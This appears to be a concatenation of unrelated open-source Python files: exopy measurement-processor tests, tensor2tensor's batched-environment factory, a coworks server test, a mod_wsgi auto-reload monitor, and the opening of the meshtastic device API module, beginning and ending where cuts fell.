timeout=40e3) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(240) def test_stopping_processing_while_in_pause(exopy_qtbot, processor, measurement_with_tools): """Test stopping processing while in pause before starting main. 
""" plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) def wait_on_state_paused(timeout): assert processor._state.wait(timeout, 'paused') measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) processor.pause_measurement() pre_hook.accept_pause = False pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) processor.stop_processing(no_post_exec=True) exopy_qtbot.wait(0.2) def wait(timeout): processor._thread.join(timeout) assert not processor._thread.is_alive() exopy_qtbot.wait_until(lambda: wait(0.04), timeout=40e3) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(480) def test_pausing_measurement(exopy_qtbot, processor, measurement_with_tools): """Test running a complete measurement with pre/post-hooks and monitor. """ measurement = measurement_with_tools measurement.add_tool('pre-hook', 'dummy2') measurement.move_tool('pre-hook', 2, 0) measurement.add_tool('post-hook', 'dummy2') processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) def wait_on_state_paused(timeout): assert processor._state.wait(timeout, 'paused') pre_hook = measurement.pre_hooks['dummy2'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) # Pause inside a pre_hook. processor.pause_measurement() exopy_qtbot.wait_until(lambda: measurement.status == 'PAUSING') pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() exopy_qtbot.wait_until(lambda: pre_hook.signal_resuming.wait(0.04), timeout=40e3) assert measurement.status == 'RESUMING' pre_hook.go_on_resuming.set() exopy_qtbot.wait_until(lambda: pre_hook.signal_resumed.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' # Pause in between two pre_hooks processor.pause_measurement() pre_hook.go_on_resumed.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() # Pause just before starting the main measurement. pre_hook2 = measurement.pre_hooks['dummy'] pre_hook2.accept_pause = False exopy_qtbot.wait_until(lambda: pre_hook2.waiting.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' processor.pause_measurement() pre_hook2.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) processor.resume_measurement() # Pause during the main task execution. 
exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.pause_measurement() processor.engine.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() exopy_qtbot.wait_until(lambda: processor.engine.signal_resuming.wait(0.04), timeout=40e3) assert measurement.status == 'RESUMING' processor.engine.go_on_resuming.set() exopy_qtbot.wait_until(lambda: processor.engine.signal_resumed.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' processor.engine.go_on_resumed.set() # Pause inside a post_hook. post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) processor.pause_measurement() exopy_qtbot.wait_until(lambda: measurement.status == 'PAUSING') post_hook.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() exopy_qtbot.wait_until(lambda: post_hook.signal_resuming.wait(0.04), timeout=40e3) assert measurement.status == 'RESUMING' post_hook.go_on_resuming.set() exopy_qtbot.wait_until(lambda: post_hook.signal_resumed.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' # Pause in between two post_hooks processor.pause_measurement() post_hook.go_on_resumed.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() post_hook2 = measurement.post_hooks['dummy2'] exopy_qtbot.wait_until(lambda: post_hook2.waiting.wait(0.04), timeout=40e3) post_hook2.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'COMPLETED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected def test_monitor_creation(processor, measurement, exopy_qtbot, dialog_sleep): """Test all possible possibilities when creating a monitor dock item. """ def run(exopy_qtbot, measurement): t = Thread(target=processor._start_monitors, args=(measurement,)) t.start() exopy_qtbot.wait_until(lambda: not t.is_alive(), timeout=10e3) exopy_qtbot.wait(dialog_sleep) processor.engine = processor.plugin.create('engine', 'dummy') measurement.add_tool('monitor', 'dummy') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 1 measurement.add_tool('monitor', 'dummy2') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 2 measurement.remove_tool('monitor', 'dummy2') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 1 measurement.add_tool('monitor', 'dummy3') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 2 measurement.add_tool('monitor', 'dummy4') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 2 processor.plugin.stop() assert not processor.monitors_window
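
# A short note on running the suite above: the timeout markers rely on the
# pytest-timeout plugin, and the fixtures (exopy_qtbot, measurement_workbench,
# measurement, dialog_sleep, ...) come from exopy's own testing helpers, so a
# typical invocation from the repository checkout would be something like
# (the exact layout is an assumption):
#
#   pytest test_processor.py -v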
batch_env_factory.py
# coding=utf-8 # Copyright 2018 The Tensor2Tensor Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for creating batched environments.""" # The code was based on Danijar Hafner's code from tf.agents: # https://github.com/tensorflow/agents/blob/master/agents/tools/wrappers.py # https://github.com/tensorflow/agents/blob/master/agents/scripts/utility.py from __future__ import absolute_import from __future__ import division from __future__ import print_function import atexit import multiprocessing import os import random import signal import subprocess import sys import traceback from tensor2tensor.rl.envs import batch_env from tensor2tensor.rl.envs import py_func_batch_env from tensor2tensor.rl.envs import simulated_batch_env import tensorflow as tf def batch_env_factory(hparams, xvfb=False): """Factory of batch envs.""" environment_spec = hparams.environment_spec if environment_spec.simulated_env: # TODO(piotrmilos): Consider passing only relevant parameters cur_batch_env = _define_simulated_batch_env( environment_spec, hparams.num_agents) else: cur_batch_env = _define_batch_env(hparams.environment_spec, hparams.num_agents, xvfb=xvfb) return cur_batch_env def _define_batch_env(environment_spec, num_agents, xvfb=False): """Create environments and apply all desired wrappers.""" with tf.variable_scope("environments"): envs = [ ExternalProcessEnv(environment_spec.env_lambda, xvfb) for _ in range(num_agents)] env = batch_env.BatchEnv(envs, blocking=False) env = py_func_batch_env.PyFuncBatchEnv(env) return env def _define_simulated_batch_env(environment_spec, num_agents): cur_batch_env = simulated_batch_env.SimulatedBatchEnv(environment_spec, num_agents) return cur_batch_env class ExternalProcessEnv(object): """Step environment in a separate process for lock free parallelism.""" # Message types for communication via the pipe. _ACCESS = 1 _CALL = 2 _RESULT = 3 _EXCEPTION = 4 _CLOSE = 5 def __init__(self, constructor, xvfb): """Step environment in a separate process for lock free parallelism. The environment will be created in the external process by calling the specified callable. This can be an environment class, or a function creating the environment and potentially wrapping it. The returned environment should not access global variables. Args: constructor: Callable that creates and returns an OpenAI gym environment. xvfb: Frame buffer. Attributes: observation_space: The cached observation space of the environment. action_space: The cached action space of the environment. 
""" self._conn, conn = multiprocessing.Pipe() if xvfb: server_id = random.randint(10000, 99999) auth_file_id = random.randint(10000, 99999999999) xauthority_path = "/tmp/Xauthority_{}".format(auth_file_id) command = "Xvfb :{} -screen 0 1400x900x24 -nolisten tcp -auth {}".format( server_id, xauthority_path) with open(os.devnull, "w") as devnull: proc = subprocess.Popen(command.split(), shell=False, stdout=devnull, stderr=devnull) atexit.register(lambda: os.kill(proc.pid, signal.SIGKILL)) def constructor_using_xvfb(): os.environ["DISPLAY"] = ":{}".format(server_id) os.environ["XAUTHORITY"] = xauthority_path return constructor() self._process = multiprocessing.Process( target=self._worker, args=(constructor_using_xvfb, conn)) else: self._process = multiprocessing.Process( target=self._worker, args=(constructor, conn)) atexit.register(self.close) self._process.start() self._observ_space = None self._action_space = None @property def observation_space(self): if not self._observ_space: self._observ_space = self.__getattr__("observation_space") return self._observ_space @property def action_space(self): if not self._action_space: self._action_space = self.__getattr__("action_space") return self._action_space def __getattr__(self, name): """Request an attribute from the environment. Note that this involves communication with the external process, so it can be slow. Args: name: Attribute to access. Returns: Value of the attribute. """ self._conn.send((self._ACCESS, name)) return self._receive() def call(self, name, *args, **kwargs): """Asynchronously call a method of the external environment. Args: name: Name of the method to call. *args: Positional arguments to forward to the method. **kwargs: Keyword arguments to forward to the method. Returns: Promise object that blocks and provides the return value when called. """ payload = name, args, kwargs self._conn.send((self._CALL, payload)) return self._receive def close(self): """Send a close message to the external process and join it.""" try: self._conn.send((self._CLOSE, None)) self._conn.close() except IOError: # The connection was already closed. pass self._process.join() def step(self, action, blocking=True): """Step the environment. Args: action: The action to apply to the environment. blocking: Whether to wait for the result. Returns: Transition tuple when blocking, otherwise callable that returns the transition tuple. """ promise = self.call("step", action) if blocking: return promise() return promise def reset(self, blocking=True): """Reset the environment. Args: blocking: Whether to wait for the result. Returns: New observation when blocking, otherwise callable that returns the new observation. """ promise = self.call("reset") if blocking: return promise() return promise def _receive(self): """Wait for a message from the worker process and return its payload. Raises: Exception: An exception was raised inside the worker process. KeyError: The received message is of an unknown type. Returns: Payload object of the message. """ message, payload = self._conn.recv() # Re-raise exceptions in the main process. if message == self._EXCEPTION: stacktrace = payload raise Exception(stacktrace) if message == self._RESULT: return payload raise KeyError("Received message of unexpected type {}".format(message)) def _worker(self, constructor, conn): """The process waits for actions and sends back environment results. Args: constructor: Constructor for the OpenAI Gym environment. conn: Connection for communication to the main process. 
""" try: env = constructor() while True: try: # Only block for short times to have keyboard exceptions be raised. if not conn.poll(0.1): continue message, payload = conn.recv() except (EOFError, KeyboardInterrupt): break if message == self._ACCESS: name = payload result = getattr(env, name) conn.send((self._RESULT, result)) continue if message == self._CALL: name, args, kwargs = payload result = getattr(env, name)(*args, **kwargs) conn.send((self._RESULT, result)) continue if message == self._CLOSE: assert payload is None env.close() break raise KeyError("Received message of unknown type {}".format(message)) except Exception: # pylint: disable=broad-except stacktrace = "".join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter tf.logging.error("Error in environment process: {}".format(stacktrace)) conn.send((self._EXCEPTION, stacktrace)) conn.close()
test_complete.py
import multiprocessing import os import time from unittest import mock import requests from coworks.utils import import_attr class TestClass: @mock.patch.dict(os.environ, {"FLASK_RUN_FROM_CLI": "false", "AWS_XRAY_SDK_ENABLED": "false"}) def test_run_complete(self, samples_docs_dir, unused_tcp_port): app = import_attr('complete', 'app', cwd=samples_docs_dir) server = multiprocessing.Process(target=run_server, args=(app, unused_tcp_port), daemon=False) server.start() counter = 1 time.sleep(counter) while not server.is_alive() and counter < 3: time.sleep(counter) counter += 1 response = requests.get(f'http://localhost:{unused_tcp_port}/', headers={'Authorization': "token"}) assert response.text == "Stored value 0.\n" response = requests.get(f'http://localhost:{unused_tcp_port}/admin/route', headers={'Authorization': "token"}) assert response.status_code == 200 server.terminate() def run_server(app, port): print(f"Server starting on port {port}") app.run(host='localhost', port=port, use_reloader=False, debug=False)
monitor.py
# Automatically restart when the source code changes. # From http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode import os import sys import time import signal import threading import atexit import Queue _interval = 1.0 _times = {} _files = [] _running = False _queue = Queue.Queue() _lock = threading.Lock() def _restart(path): _queue.put(True) prefix = 'monitor (pid=%d):' % os.getpid() print >> sys.stderr, '%s Change detected to \'%s\'.' % (prefix, path) print >> sys.stderr, '%s Triggering process restart.' % prefix os.kill(os.getpid(), signal.SIGINT) def _modified(path): try: # If path doesn't denote a file and were previously # tracking it, then it has been removed or the file type # has changed so force a restart. If not previously # tracking the file then we can ignore it as probably # pseudo reference such as when file extracted from a # collection of modules contained in a zip file. if not os.path.isfile(path): return path in _times # Check for when file last modified. mtime = os.stat(path).st_mtime if path not in _times: _times[path] = mtime # Force restart when modification time has changed, even # if time now older, as that could indicate older file # has been restored. if mtime != _times[path]: return True except: # If any exception occured, likely that file has been # been removed just before stat(), so force a restart. return True return False def _monitor(): while 1: # Check modification times on all files in sys.modules. for module in sys.modules.values(): if not hasattr(module, '__file__'): continue path = getattr(module, '__file__') if not path: continue if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']: path = path[:-1] if _modified(path): return _restart(path) # Check modification times on files which have # specifically been registered for monitoring. for path in _files: if _modified(path): return _restart(path) # Go to sleep for specified interval. try: return _queue.get(timeout=_interval) except: pass _thread = threading.Thread(target=_monitor) _thread.setDaemon(True) def _exiting(): try: _queue.put(True) except: pass _thread.join() atexit.register(_exiting) def track(path): if not path in _files: _files.append(path) def start(interval=1.0): global _interval if interval < _interval: _interval = interval global _running _lock.acquire() if not _running: prefix = 'monitor (pid=%d):' % os.getpid() print >> sys.stderr, '%s Starting change monitor.' % prefix _running = True _thread.start() _lock.release()
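
# Typical usage in the WSGI script this recipe targets (the config-file path is
# illustrative; track() is only needed for files that never appear in sys.modules):
#
# import monitor
# monitor.start(interval=1.0)          # watch imported modules for changes
# monitor.track('/path/to/site.cf')    # also watch an extra, non-module file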
__init__.py
""" # an API for Meshtastic devices Primary class: SerialInterface Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)" Source code on [github](https://github.com/meshtastic/Meshtastic-python) properties of SerialInterface: - radioConfig - Current radio configuration and device settings, if you write to this the new settings will be applied to the device. - nodes - The database of received nodes. Includes always up-to-date location and username information for each node in the mesh. This is a read-only datastructure. - myNodeInfo - Contains read-only information about the local radio device (software version, hardware version, etc) # Published PubSub topics We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available topics: - meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB - meshtastic.connection.lost - published once we've lost our link to the radio - meshtastic.receive.text(packet) - delivers a received packet as a dictionary, if you only care about a particular type of packet, you should subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive". - meshtastic.receive.position(packet) - meshtastic.receive.user(packet) - meshtastic.receive.data(packet) - meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...) We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet you'll see the fields in the dictionary. decoded.data.payload will contain the raw bytes that were sent. If the packet was sent with sendText, decoded.data.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for unicode scripts they can be different. # Example Usage ``` import meshtastic from pubsub import pub def onReceive(packet, interface): # called when a packet arrives print(f"Received: {packet}") def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio # defaults to broadcast, specify a destination ID if you wish interface.sendText("hello mesh") pub.subscribe(onReceive, "meshtastic.receive") pub.subscribe(onConnection, "meshtastic.connection.established") # By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0 interface = meshtastic.SerialInterface() ``` """ import socket import pygatt import google.protobuf.json_format import serial import threading import logging import time import sys import traceback import time import base64 import platform from . import mesh_pb2 from . 
import util from pubsub import pub from dotmap import DotMap START1 = 0x94 START2 = 0xc3 HEADER_LEN = 4 MAX_TO_FROM_RADIO_SIZE = 512 BROADCAST_ADDR = "^all" # A special ID that means broadcast # if using 8 bit nodenums this will be shortend on the target BROADCAST_NUM = 0xffffffff MY_CONFIG_ID = 42 """The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand""" OUR_APP_VERSION = 172 class MeshInterface: """Interface class for meshtastic devices Properties: isConnected nodes debugOut """ def __init__(self, debugOut=None, noProto=False): """Constructor""" self.debugOut = debugOut self.nodes = None # FIXME self.isConnected = False if not noProto: self._startConfig() def sendText(self, text, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False): """Send a utf8 string to some other node, if the node has a display it will also be shown on the device. Arguments: text {string} -- The text to send Keyword Arguments: destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR}) wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery) Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks. """ return self.sendData(text.encode("utf-8"), destinationId, dataType=mesh_pb2.Data.CLEAR_TEXT, wantAck=wantAck, wantResponse=wantResponse) def sendData(self, byteData, destinationId=BROADCAST_ADDR, dataType=mesh_pb2.Data.OPAQUE, wantAck=False, wantResponse=False): """Send a data packet to some other node Keyword Arguments: destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR}) wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery) Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks. """ meshPacket = mesh_pb2.MeshPacket() meshPacket.decoded.data.payload = byteData meshPacket.decoded.data.typ = dataType meshPacket.decoded.want_response = wantResponse return self.sendPacket(meshPacket, destinationId, wantAck=wantAck) def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False): """ Send a position packet to some other node (normally a broadcast) Also, the device software will notice this packet and use it to automatically set its notion of the local position. If timeSec is not specified (recommended), we will use the local machine time. Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks. """ meshPacket = mesh_pb2.MeshPacket() if(latitude != 0.0): meshPacket.decoded.position.latitude_i = int(latitude / 1e-7) if(longitude != 0.0): meshPacket.decoded.position.longitude_i = int(longitude / 1e-7) if(altitude != 0): meshPacket.decoded.position.altitude = int(altitude) if timeSec == 0: timeSec = time.time() # returns unix timestamp in seconds meshPacket.decoded.position.time = int(timeSec) meshPacket.decoded.want_response = wantResponse return self.sendPacket(meshPacket, destinationId, wantAck=wantAck) def sendPacket(self, meshPacket, destinationId=BROADCAST_ADDR, wantAck=False): """Send a MeshPacket to the specified node (or if unspecified, broadcast). You probably don't want this - use sendData instead. Returns the sent packet. 
The id field will be populated in this packet and can be used to track future message acks/naks. """ toRadio = mesh_pb2.ToRadio() # FIXME add support for non broadcast addresses if isinstance(destinationId, int): nodeNum = destinationId elif destinationId == BROADCAST_ADDR: nodeNum = BROADCAST_NUM else: nodeNum = self.nodes[destinationId]['num'] meshPacket.to = nodeNum meshPacket.want_ack = wantAck # if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID # so the message can be tracked. if meshPacket.id == 0: meshPacket.id = self._generatePacketId() toRadio.packet.CopyFrom(meshPacket) self._sendToRadio(toRadio) return meshPacket def writeConfig(self): """Write the current (edited) radioConfig to the device""" if self.radioConfig == None: raise Exception("No RadioConfig has been read") t = mesh_pb2.ToRadio() t.set_radio.CopyFrom(self.radioConfig) self._sendToRadio(t) @property def channelURL(self): """The sharable URL that describes the current channel """ bytes = self.radioConfig.channel_settings.SerializeToString() s = base64.urlsafe_b64encode(bytes).decode('ascii') return f"https://www.meshtastic.org/c/#{s}" def _generatePacketId(self): """Get a new unique packet ID""" if self.currentPacketId is None: raise Exception("Not connected yet, can not generate packet") else: self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff return self.currentPacketId def _disconnected(self): """Called by subclasses to tell clients this interface has disconnected""" self.isConnected = False pub.sendMessage("meshtastic.connection.lost", interface=self) def _connected(self): """Called by this class to tell clients we are now fully connected to a node """ self.isConnected = True pub.sendMessage("meshtastic.connection.established", interface=self) def _startConfig(self): """Start device packets flowing""" self.myInfo = None self.nodes = {} # nodes keyed by ID self._nodesByNum = {} # nodes keyed by nodenum self.radioConfig = None self.currentPacketId = None startConfig = mesh_pb2.ToRadio() startConfig.want_config_id = MY_CONFIG_ID # we don't use this value self._sendToRadio(startConfig) def _sendToRadio(self, toRadio): """Send a ToRadio protobuf to the device""" logging.error(f"Subclass must provide toradio: {toRadio}") def _handleFromRadio(self, fromRadioBytes): """ Handle a packet that arrived from the radio(update model and publish events) Called by subclasses.""" fromRadio = mesh_pb2.FromRadio() fromRadio.ParseFromString(fromRadioBytes) asDict = google.protobuf.json_format.MessageToDict(fromRadio) logging.debug(f"Received: {asDict}") if fromRadio.HasField("my_info"): self.myInfo = fromRadio.my_info if self.myInfo.min_app_version > OUR_APP_VERSION: raise Exception( "This device needs a newer python client, please \"pip install --upgrade meshtastic\"") # start assigning our packet IDs from the opposite side of where our local device is assigning them self.currentPacketId = ( self.myInfo.current_packet_id + 0x80000000) & 0xffffffff elif fromRadio.HasField("radio"): self.radioConfig = fromRadio.radio elif fromRadio.HasField("node_info"): node = asDict["nodeInfo"] try: self._fixupPosition(node["position"]) except: logging.debug("Node without position") self._nodesByNum[node["num"]] = node if "user" in node: # Some nodes might not have user/ids assigned yet self.nodes[node["user"]["id"]] = node elif fromRadio.config_complete_id == MY_CONFIG_ID: # we ignore the config_complete_id, it is unneeded for our stream API fromRadio.config_complete_id self._connected() 
elif fromRadio.HasField("packet"): self._handlePacketFromRadio(fromRadio.packet) elif fromRadio.rebooted: # Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port MeshInterface._disconnected(self) self._startConfig() # redownload the node db etc... else: logging.debug("Unexpected FromRadio payload") def _fixupPosition(self, position): """Convert integer lat/lon into floats Arguments: position {Position dictionary} -- object ot fix up """ if "latitudeI" in position: position["latitude"] = position["latitudeI"] * 1e-7 if "longitudeI" in position: position["longitude"] = position["longitudeI"] * 1e-7 def _nodeNumToId(self, num): """Map a node node number to a node ID Arguments: num {int} -- Node number Returns: string -- Node ID """ if num == BROADCAST_NUM: return BROADCAST_ADDR try: return self._nodesByNum[num]["user"]["id"] except: logging.warn("Node not found for fromId") return None def _getOrCreateByNum(self, nodeNum): """Given a nodenum find the NodeInfo in the DB (or create if necessary)""" if nodeNum == BROADCAST_NUM: raise Exception("Can not create/find nodenum by the broadcast num") if nodeNum in self._nodesByNum: return self._nodesByNum[nodeNum] else: n = {"num": nodeNum} # Create a minimial node db entry self._nodesByNum[nodeNum] = n return n def _handlePacketFromRadio(self, meshPacket): """Handle a MeshPacket that just arrived from the radio Will publish one of the following events: - meshtastic.receive.text(packet = MeshPacket dictionary) - meshtastic.receive.position(packet = MeshPacket dictionary) - meshtastic.receive.user(packet = MeshPacket dictionary) - meshtastic.receive.data(packet = MeshPacket dictionary) """ asDict = google.protobuf.json_format.MessageToDict(meshPacket) # /add fromId and toId fields based on the node ID asDict["fromId"] = self._nodeNumToId(asDict["from"]) asDict["toId"] = self._nodeNumToId(asDict["to"]) # We could provide our objects as DotMaps - which work with . notation or as dictionaries # asObj = DotMap(asDict) topic = "meshtastic.receive" # Generic unknown packet type if meshPacket.decoded.HasField("position"): topic = "meshtastic.receive.position" p = asDict["decoded"]["position"] self._fixupPosition(p) # update node DB as needed self._getOrCreateByNum(asDict["from"])["position"] = p if meshPacket.decoded.HasField("user"): topic = "meshtastic.receive.user" u = asDict["decoded"]["user"] # update node DB as needed n = self._getOrCreateByNum(asDict["from"]) n["user"] = u # We now have a node ID, make sure it is uptodate in that table self.nodes[u["id"]] = u if meshPacket.decoded.HasField("data"): topic = "meshtastic.receive.data" # OPAQUE is the default protobuf typ value, and therefore if not set it will not be populated at all # to make API usage easier, set it to prevent confusion if not "typ" in asDict["decoded"]["data"]: asDict["decoded"]["data"]["typ"] = "OPAQUE" # For text messages, we go ahead and decode the text to ascii for our users if asDict["decoded"]["data"]["typ"] == "CLEAR_TEXT": topic = "meshtastic.receive.text" # We don't throw if the utf8 is invalid in the text message. Instead we just don't populate # the decoded.data.text and we log an error message. This at least allows some delivery to # the app and the app can deal with the missing decoded representation. # # Usually btw this problem is caused by apps sending binary data but setting the payload type to # text. 
try: asDict["decoded"]["data"]["text"] = meshPacket.decoded.data.payload.decode("utf-8") except Exception as ex: logging.error(f"Malformatted utf8 in text message: {ex}") pub.sendMessage(topic, packet=asDict, interface=self) # Our standard BLE characteristics TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7" FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5" FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453" class BLEInterface(MeshInterface): """A not quite ready - FIXME - BLE interface to devices""" def __init__(self, address, debugOut=None): self.address = address self.adapter = pygatt.GATTToolBackend() # BGAPIBackend() self.adapter.start() logging.debug(f"Connecting to {self.address}") self.device = self.adapter.connect(address) logging.debug("Connected to device") # fromradio = self.device.char_read(FROMRADIO_UUID) MeshInterface.__init__(self, debugOut=debugOut) self._readFromRadio() # read the initial responses def handle_data(handle, data): self._handleFromRadio(data) self.device.subscribe(FROMNUM_UUID, callback=handle_data) def _sendToRadio(self, toRadio): """Send a ToRadio protobuf to the device""" logging.debug(f"Sending: {toRadio}") b = toRadio.SerializeToString() self.device.char_write(TORADIO_UUID, b) def close(self): self.adapter.stop() def _readFromRadio(self): wasEmpty = False while not wasEmpty: b = self.device.char_read(FROMRADIO_UUID) wasEmpty = len(b) == 0 if not wasEmpty: self._handleFromRadio(b) class StreamInterface(MeshInterface): """Interface class for meshtastic devices over a stream link (serial, TCP, etc)""" def __init__(self, debugOut=None, noProto=False, connectNow=True): """Constructor, opens a connection to self.stream Keyword Arguments: devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None}) debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None}) Raises: Exception: [description] Exception: [description] """ if not hasattr(self, 'stream'): raise Exception( "StreamInterface is now abstract (to update existing code create SerialInterface instead)") self._rxBuf = bytes() # empty self._wantExit = False self._rxThread = threading.Thread(target=self.__reader, args=()) MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto) # Start the reader thread after superclass constructor completes init if connectNow: self.connect() def connect(self): """Connect to our radio Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually start the reading thread later. 
""" # Send some bogus UART characters to force a sleeping device to wake self._writeBytes(bytes([START1, START1, START1, START1])) time.sleep(0.1) # wait 100ms to give device time to start running self._rxThread.start() def _disconnected(self): """We override the superclass implementation to close our port""" MeshInterface._disconnected(self) logging.debug("Closing our port") if not self.stream is None: self.stream.close() def _writeBytes(self, b): """Write an array of bytes to our stream and flush""" self.stream.write(b) self.stream.flush() def _readBytes(self, len): """Read an array of bytes from our stream""" return self.stream.read(len) def _sendToRadio(self, toRadio): """Send a ToRadio protobuf to the device""" logging.debug(f"Sending: {toRadio}") b = toRadio.SerializeToString() bufLen = len(b) # We convert into a string, because the TCP code doesn't work with byte arrays header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff]) self._writeBytes(header + b) def close(self): """Close a connection to the device""" logging.debug("Closing serial stream") # pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us self._wantExit = True if self._rxThread != threading.current_thread(): self._rxThread.join() # wait for it to exit def __reader(self): """The reader thread that reads bytes from our stream""" empty = bytes() try: while not self._wantExit: b = self._readBytes(1) if len(b) > 0: # logging.debug(f"read returned {b}") c = b[0] ptr = len(self._rxBuf) # Assume we want to append this byte, fixme use bytearray instead self._rxBuf = self._rxBuf + b if ptr == 0: # looking for START1 if c != START1: self._rxBuf = empty # failed to find start if self.debugOut != None: try: self.debugOut.write(b.decode("utf-8")) except: self.debugOut.write('?') elif ptr == 1: # looking for START2 if c != START2: self._rxBuf = empty # failed to find start2 elif ptr >= HEADER_LEN: # we've at least got a header # big endian length follos header packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3] if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length if packetlen > MAX_TO_FROM_RADIO_SIZE: self._rxBuf = empty # length ws out out bounds, restart if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN: try: self._handleFromRadio(self._rxBuf[HEADER_LEN:]) except Exception as ex: logging.error( f"Error while handling message from radio {ex}") traceback.print_exc() self._rxBuf = empty else: # logging.debug(f"timeout") pass except serial.SerialException as ex: logging.warn( f"Meshtastic serial port disconnected, disconnecting... {ex}") finally: logging.debug("reader is exiting") self._disconnected() class SerialInterface(StreamInterface): """Interface class for meshtastic devices over a serial link""" def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True): """Constructor, opens a connection to a specified serial port, or if unspecified try to find one Meshtastic device by probing Keyword Arguments: devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None}) debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. 
